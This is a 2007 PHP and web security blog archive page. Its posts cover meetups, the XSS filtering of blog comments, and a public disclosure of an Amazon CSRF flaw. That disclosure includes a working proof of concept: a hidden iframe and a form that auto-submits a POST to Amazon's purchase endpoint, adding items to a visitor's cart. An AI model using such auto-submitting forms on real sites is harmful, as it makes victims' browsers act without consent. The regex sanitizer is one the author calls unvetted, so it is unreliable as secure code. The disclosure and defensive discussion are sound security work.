About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


All posts for Mar 2007

Digg's Eli White Speaks at PHP Meetup

The April meeting of the Columbia PHP Meetup will feature Eli White, Digg's PHP guru:

For our April PHP meetup, Eli White of Digg will be giving an insider's tour of Digg, including what they're up to and how they're using PHP. We've got a great meeting space at OmniTI and will be providing plenty of pizza and soda for everyone.

I really enjoyed our last meeting, and I'm looking forward to Eli's talk. I hope to see you there!

For those who don't live in the Baltimore / Columbia / DC area, we'll be recording Eli's talk and will post the MP3.

My Amazon Anniversary

Today I am revealing an exploitable security vulnerability in Amazon. Before I do, I want to provide some history and context.

On this day last year, I informed Amazon about a pretty serious vulnerability and demonstrated it with a few examples and a detailed description. In the description, I explained how to exploit the infamous "1-Click" feature, causing victims to purchase items of my choosing without their knowledge or consent, and I stressed that the scope of the problem extended beyond my benign examples. After some mild prodding, I finally received a reply letting me know that my email had been received, the vulnerability had been verified, and Amazon considered fixing it a top priority.

This is usually the extent of my involvement in such affairs. It's remarkably easy to find vulnerabilities in web applications, so I see no reason to make a big deal out of every discovery. Plus, it's enough trouble to inform web sites about vulnerabilities (something many of my colleagues don't bother doing for good reasons), so once I've done so, I feel like I've fulfilled my ethical responsibility.

Despite my prodding, the vulnerability remains a year later.

I feel like Amazon has exploited my cooperative behavior and placed me in a moral dilemma. In fact, at this point, I feel like I've already done the wrong thing by withholding this information for so long. The silence ends today.

The following example demonstrates the problem:

<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe>
<form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden">
<input type="hidden" name="ASIN" value="059600656X" />
<input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />
</form>
<script>document.csrf.submit();</script>

This exploit is pretty benign, because it only adds an item to your shopping cart. Always be sure to inspect your cart carefully each time you check out!

Yes, this is CSRF, and I plan to update my article in the next few days to include Amazon and Digg as examples, and I'll elaborate a bit more on the various techniques in use today.

Amazon has started requiring re-authentication in several places, so many actions are protected against CSRF. For example, the "1-Click" feature has been improved to protect against this, because adding a new address now requires re-authenticating. This is a good thing.

This entire affair has me rethinking my stance on full disclosure, something I alluded to in a recent interview. The wikipedia article on full disclosure has this to say about responsible disclosure:

One challenge with "responsible disclosure" is that some vendors do not respond, or inordinately delay their response, to vulnerability reports that are not public. As long as a vulnerability is not widely known to the public (with enough detail to reproduce the attack), vendors may refuse to fix the vulnerability or refuse to give it enough priority to actually repair it. Unfortunately, vulnerabilities reported to a vendor may already be exploited, or may soon be detected by someone with intent to exploit them.

This is my primary concern. There's nothing particularly sophisticated about this attack, so I feel confident that someone else has discovered it by now, and as a user of Amazon myself, I'm not comfortable with that.

The RFPolicy offers a reasonable middle-ground; perhaps that's the best approach.

Allowing HTML and Preventing XSS

One of the most common problems faced by web developers is allowing some HTML without creating XSS vulnerabilities in the process. This problem comes up more and more often due to the rise of social networking and other Web 2.0 properties that embolden users.

Sorry, I couldn't resist using the word embolden. :-)

There have been numerous solutions to this problem, some of which are pretty good. In a previous post where I casually mentioned this topic, a few people made some recommendations, including:

Of course, BBCode inevitably comes up during these types of discussions, but I really hate the idea of using yet another markup language just because I'm too lazy to deal with HTML, especially if the markup language doesn't even try to be user-friendly. Edward Yang, the author of HTML Purifier, seems to agree:

BBCode came to life when developers were too lazy to parse HTML correctly and decided to invent their own markup language. As with all products of laziness, the result is completely inconsistent, unstandardized, and widely adopted.

Why isn't there a good, standard solution to this problem? I think it's because everyone (including me) has slightly different requirements. Creating a solution that caters to everyone's needs is likely to yield an overly-complex and error-prone approach, so it's not necessarily bad that multiple solutions exist.

For my new blog, I want to let readers mark up their comments to help them communicate more effectively. One of the most essential features is the ability to format code, because unformatted code can be difficult to follow. It's also important that no content is removed. I detest commenting on blogs where my comment is passed through something like strip_tags(), effectively mangling what I'm trying to say. It reminds me of using an IM client that tries to identify smilies and replace them with images, often making responses difficult to decipher.

I have reviewed several existing solutions, experimented with solutions that use DOM and Tidy, and eventually resorted to a dirt-simple approach that I'd like to share with you now.

I don't recommend using this approach until it has been reviewed and vetted by others. (Use at your own risk.)

The fundamental concept is to make the content safe by default, then carefully translate specific patterns back to valid (standards-compliant) markup. The basic framework, which allows no markup, is as follows:

<?php
 
/* Normalize Newlines */
$html = str_replace("\r", "\n", $html);
$html = preg_replace("!\n\n+!", "\n", $html);
 
/* Escaped (Safe) by Default */
$html = htmlentities($html, ENT_QUOTES, 'UTF-8');
 
/* Make Paragraphs */
$lines = explode("\n", $html);
foreach ($lines as $key => $line) {
    $lines[$key] = "<p>{$line}</p>";
}
$html = implode("\n", $lines);
 
?>

This lets people type plain comments without the need for any markup, and they can still discuss anything they want without losing part of their comment. Of course, this is the easy part, because no HTML is allowed.

Allowing simple tags like <em> can be accomplished like this:

<?php
 
/* Emphasized Text */
$html = preg_replace('!&lt;em&gt;(.*?)&lt;/em&gt;!m',
                     '<em>$1</em>',
                     $html);
 
?>

Keep in mind that this replacement is taking place after $html has been escaped, so whatever is matched by .* (and represented by $1) is already escaped. I don't use greedy matching for this particular pattern, so .* matches as little as possible to satisfy the pattern. You might prefer greedy matching, and ultimately, it only makes a difference in edge cases, such as when users want to use <em> tags as well as talk about them. Allowing users to preview comments before posting gives them the opportunity to correct any problems that arise from such cases.

Allowing <blockquote> is also pretty straightforward:

<?php
 
/* Blockquotes */
$html = preg_replace('!^&lt;blockquote&gt;(?:&lt;p&gt;)?(.*?)(?:&lt;\/p&gt;)?&lt;\/blockquote&gt;$!m',
                     '<blockquote><p>$1</p></blockquote>',
                     $html);
 
?>

As you can see, I want to accommodate users who forget to use <p> tags, but I want to make sure the output is valid regardless.

Links are a bit trickier. Consider the following:

<?php
 
/* Links */
$html = preg_replace('!&lt;a +href=&quot;(.*?)&quot;(?: +title=&quot;(.*?)&quot;)? *&gt;(.*?)&lt;/a&gt;!m',
                     '<a href="$1" title="$2">$3</a>',
                     $html);
 
?>

The content represented by $1 is already escaped, but it has a special meaning in this context. Users who click the link text ($3) will initiate a request to the URL identified by $1. Imagine a link to javascript:alert('XSS'). Although this isn't actually XSS, the result is still undesirable, because users might be tricked into clicking a link that executes malicious JavaScript. For this reason, you might consider restricting the pattern further:

<?php
 
/* Links */
$html = preg_replace('!&lt;a +href=&quot;((?:ht|f)tps?://.*?)&quot;(?: +title=&quot;(.*?)&quot;)? *&gt;(.*?)&lt;/a&gt;!m',
                     '<a href="$1" title="$2">$3</a>',
                     $html);
 
?>

I'm also allowing inline <code> tags as well as blocks of code. For the latter, I'm using the e modifier and my code highlighting technique.

You can try all of this for yourself by commenting on this post, and I'll be releasing the code once it has matured a bit more.

Please let me know if you discover any problems.

A New Beginning

I began my blog with a post entitled A New Beginning. For the first time since that post, the title seems appropriate again.

A few months ago, I decided to put more effort into my blog, starting (but not ending) with a new design. I'm very picky about design and information architecture, so I knew I had to find someone to work with that felt comfortable with my level of perfectionism. Luckily, I discovered the award-winning Grow Collective and lead designer Jon Tan. I think Jon's design speaks for itself, and you can learn more about our work together on the new about page.

This is more than a redesigned blog. Everything has been rethought, redeveloped, and redesigned from the ground up to be a useful resource for PHP and web application security enthusiasts as well as a supportive community for all web developers.

There's still a lot of work to be done and likely many bugs to be fixed. I'll have more to say in the next few days, and until then, please let me know if you discover any problems.

Paying for Answers

I've been subscribed to the general PHP mailing list for many years. I used to be very active, answering hundreds of questions a month, but lately my participation has dropped. While scanning through my backlog of email earlier, one subject caught my eye:

$35 to the first person who can do this XML-parsing PHP script

I was curious enough to open the email and read further:

I'll send $35 to someone via Paypal who can create a PHP script that will do the following:

  1. Read XML data from a URL (librarytools.com/events/sampledata.txt)
  2. Loop through all XML results and print to the screen the eventname and eventnextoccurrencedate (just the date) values.

To my surprise, no one had responded, so I decided to quickly provide a solution. I wasn't expecting to be paid, but I couldn't resist calling someone's bluff, especially since I knew SimpleXML would make this a 5-minute problem, regardless of what the XML document looked like. A few minutes later, I responded:

<table>
    <tr><th>Name</th><th>Date</th></tr>
<?php
 
$xml = simplexml_load_file('http://librarytools.com/events/sampledata.txt');
 
foreach ($xml->source->result as $f) {
    $name = '?';
    $date = '?';
 
    foreach ($f as $value) {
        if ($value['n'] == 'eventname') {
            $name = $value;
        } elseif ($value['n'] == 'eventnextoccurrencedate') {
            $date = date('D, d M Y H:i:s', strtotime($value));
        }
    }
 
    echo "    <tr><td>{$name}</td><td>{$date}</td></tr>\n";
}
 
?>
</table>

I don't bring this up to extol the virtues of SimpleXML. I'm more interested in exploring the idea of paying for answers.

Paying for answers isn't a new idea (even Google has experimented with it), but I can't think of a success story. Can you?

OWASP Spring of Code 2007

During the lightning talks at tonight's PHP Meetup, Andrew van der Stock (executive director of OWASP) announced the Spring of Code 2007, an effort that will distribute $100,000 to worthy projects, divided approximately as follows:

  • $20,000 for one lucky project.
  • $10,000 for 10 open source projects.
  • $40,000 for 8 large projects.
  • $22,500 for 9 medium projects.
  • $7,500 for an internship.

The emphasis is on open source projects that are related to web application security, and Andrew expressed a specific interest in improving PHP. As he has noted in the past, it's more difficult than it should be to develop secure applications in PHP. As the leading platform for web application development, PHP could advance the state of the art, but as Andrew stated tonight, it has some catching up to do in a few areas like SQL injection, although PDO is a big step in the right direction.

Other talks included Wez Furlong on OpenID, Alex Mikitik on PHP testing (using test-more.php and a PHP port of prove that he wrote), and John Schulz on jQuery. (I talked about CSRF.) All in all, it was a successful inaugural meeting.

If you're interested in joining us for future meetings, please join the mailing list and our PHP Meetup. Our next meeting will be 02 Apr - hope to see you there!